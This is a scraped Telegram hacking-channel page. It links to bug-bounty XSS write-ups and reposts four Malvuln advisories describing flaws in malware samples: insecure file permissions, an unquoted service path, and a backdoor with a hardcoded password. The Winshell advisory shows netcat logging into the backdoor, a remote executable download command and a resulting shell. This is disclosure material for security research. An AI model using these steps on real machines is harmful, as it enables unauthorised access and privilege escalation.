Hacking Articles Tips Tricks Videos Tutorials
470 subscribers
66K photos
15 videos
157 files
132K links
Exploit
Pentesting
Hacking
Red Team
Blue Team
Kali Linux
Bug Bounty
Black Hat
Cyber security etc

@Hacking_Video
@Hacking_attack
Download Telegram
How I found 3 RXSS on the Lululemon bug bounty program

Hi everybody, today i will show you how can simple technique lead you to find multiple series vulnerabilities across the whole subdomainsContinue reading on Medium »
Read more...
Hi everybody, today i will show you how can simple technique lead you to find multiple series vulnerabilities across the whole subdomainsContinue reading on Medium » (https://omar0x01.medium.com/how-i-found-3-rxss-on-the-lululemon-bug-bounty-program-fa357a0154c2?source=rss------bug_bounty-5)
Bug bounty həvəskarları üçün yazıram xüsusi olaraq — siz də standart sadə xss payloadlarını bütün bug bounty saytlarında sınamaqdan…Continue reading on Medium » (https://memmedrehimzade.medium.com/poliqlot-xss-payload-vasit%C9%99sil%C9%99-bug-bounty-946732c1ba98?source=rss------bug_bounty-5)
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Trojan.Win32.Autoit.fhj MVID-2022-0637 Insecure Permissions

https://2.bp.blogspot.com/-209TE5VbJR0/WWlvlKjkdxI/AAAAAAAAIQ8/gHk0ahoua8cqyTuIh5dYs6hAVa_ekYeoACLcBGAs/s1600/hack_img.png
Trojan.Win32.Autoit.fhj malware suffers from an insecure permissions vulnerability.

SHA-256 | 0f6155ea2513333fd3502daa57841369a525497799193023cf1e190924b6beef

Download
Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022
Original source: https://malvuln.com/advisory/d871836f77076eeed87eb0078c1911c7.txt
Contact: malvuln13@gmail.com
Media: twitter.com/malvuln

Threat: Trojan.Win32.Autoit.fhj
Vulnerability: Insecure Permissions
Description: The malware writes two hidden DLL files "vp8decoder.dll" and "vp8encoder.dll" to its installation directory granting full (F) permissions to the Everyone user group. Any user can replace the PE files dropped by the malware to disable it or replace it with their own executable. Then wait for a privileged user to logon to the infected machine to potentially escalate privileges.
Family: Autoit
Type: PE32
MD5: d871836f77076eeed87eb0078c1911c7
Vuln ID: MVID-2022-0637
Disclosure: 09/06/2022

Exploit/PoC:
insecure dir permissions for two DLL's with bunch hidden files

C:\Program Files (x86)\XPS Rasterization Service Component>attrib -s -h *
C:\Program Files (x86)\XPS Rasterization Service Component>cacls *
C:\Program Files (x86)\XPS Rasterization Service Component\vp8decoder.dll Everyone:F
C:\Program Files (x86)\XPS Rasterization Service Component\vp8encoder.dll Everyone:F
Directory of C:\Program Files (x86)\XPS Rasterization Service Component

09/05/2022 12:18 AM 1,165 Log(05.09.2022).txt
09/05/2022 12:15 AM 803,971 Screen(00_15).jpg
02/21/2017 02:58 PM 2,665 settings.dat
07/15/2015 12:19 PM 143,568 vp8decoder.dll
07/15/2015 12:19 PM 539,856 vp8encoder.dll
09/05/2022 12:15 AM 2,052,816 xps.exe
02/21/2017 01:24 PM 2,031,104 xservice.exe
7 File(s) 5,575,145 bytes
Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Source:packetstormsecurity.com
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Backdoor.Win32.Winshell.5_0 MVID-2022-0633 Hardcoded Credential

https://4.bp.blogspot.com/-slZrAXCcTc4/WWlvSkUdx-I/AAAAAAAAINc/GD9pE2wpupUfP-XcYlxrz5jw2m91dZTOgCLcBGAs/s1600/h39.png
Backdoor.Win32.Winshell.5_0 malware suffers from a hardcoded credential vulnerability.

SHA-256 | 201d48fd8e208d4a8f0f5fe13f6ea04030c8b92edf569417c28e11967d421e3b

Download
Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022
Original source: https://malvuln.com/advisory/5bc5f72d19019a2fa3b75896e82ae1e5.txt
Contact: malvuln13@gmail.com
Media: twitter.com/malvuln

Threat: Backdoor.Win32.Winshell.5_0
Vulnerability: Weak Hardcoded Credentials
Description: The malware is UPX packed, listens on TCP port 5277 and requires authentication for remote access. However, the password "123456789" is weak and hardcoded within the PE file. Unpacking the executable, easily reveals the cleartext password.
Family: Winshell
Type: PE
MD5: 5bc5f72d19019a2fa3b75896e82ae1e5
Vuln ID: MVID-2022-0633
Disclosure: 09/06/2022

Exploit/PoC:
C:\>nc64.exe x.x.x.x 5277
Password:123456789

WinShell v5.0 (C)2002 janker.org

? for help
CMD>?

i Install
r Remove
p Path
b reBoot
d shutDown
s Shell
x eXit
q Quit

Download:
CMD>http://.../srv.exe

? for help
CMD>s
Microsoft Windows [Version 10.0.16299.309]
(c) 2017 Microsoft Corporation. All rights reserved.

C:\dump>

Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Source:packetstormsecurity.com
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Trojan-Spy.Win32.Pophot.bsl MVID-2022-0635 Insecure Permissions

https://4.bp.blogspot.com/-Nd-X_KvCLtU/WWlu3jy7alI/AAAAAAAAIIw/wd38Z8AjxRAJh0AdUZMKadOiqPJQRSLMgCLcBGAs/s1600/h101.png
Trojan-Spy.Win32.Pophot.bsl malware suffers from an insecure permissions vulnerability.

SHA-256 | d84abac25b9b004380790dd21ceec9c49b73c59db79cee24d39decbe0e1623e1

Download
Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022
Original source: https://malvuln.com/advisory/8c0e6ec6b8ac9eb1169e63df71f24456.txt
Contact: malvuln13@gmail.com
Media: twitter.com/malvuln

Threat: Trojan-Spy.Win32.Pophot.bsl
Vulnerability: Insecure Permissions
Description: The malware writes a BATCH file ".bat" to c drive granting change (C) permissions to the authenticated user group. Standard users can rename the file dropped by the malware to disable it or replace it with their own executable. Then wait for a privileged user to logon to the infected machine to potentially escalate privileges.
Family: Pophot
Type: PE32
MD5: 8c0e6ec6b8ac9eb1169e63df71f24456
Vuln ID: MVID-2022-0635
Disclosure: 09/06/2022

Exploit/PoC:
C:\>type zhqbdf.bat

"C:\WINDOWS\system\zhqbs080722.exe" i
del %0

C:\>cacls zhqbdf.bat
C:\zhqbdf.bat BUILTIN\Administrators:(ID)F
NT AUTHORITY\SYSTEM:(ID)F
BUILTIN\Users:(ID)R
NT AUTHORITY\Authenticated Users:(ID)C
Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).


Source:packetstormsecurity.com
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Backdoor.Win32.Hupigon.aspg MVID-2022-0634 Unquoted Service Path

https://4.bp.blogspot.com/-B5GiRC1v-wQ/WWlu5E53nEI/AAAAAAAAIJE/W3BLkm7Hy_YnB0vtTzhGYY_ZESaF8C84ACLcBGAs/s1600/h105.png
Backdoor.Win32.Hupigon.aspg malware suffers from an unquoted service path vulnerability.

SHA-256 | 887752ece5bea2b15b4d32426b1e97bffee8aa1a6842c8f917087432b7ff5e71

Download
Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022
Original source: https://malvuln.com/advisory/121bf601275e2aed0c3a6fe7910f9826.txt
Contact: malvuln13@gmail.com
Media: twitter.com/malvuln

Threat: Backdoor.Win32.Hupigon.aspg
Vulnerability: Insecure Service Path
Description: The malware creates a service with an unquoted path. Attackers who can place an arbitrary executable named "Program.exe" under c:\ drive can potentially undermine the malware by having it run theirs instead with LocalSystem privs.
Family: Hupigon
Type: PE32
MD5: 121bf601275e2aed0c3a6fe7910f9826
Vuln ID: MVID-2022-0634
Disclosure: 09/06/2022

Exploit/PoC:
C:\dump>sc qc VServer_2007
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: VServer_2007
TYPE : 110 WIN32_OWN_PROCESS (interactive)
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 0 IGNORE
BINARY_PATH_NAME : C:\Program Files\Common Files\Microsoft Shared\MSInfo\R_Server.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : V_Server
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).

Source:packetstormsecurity.com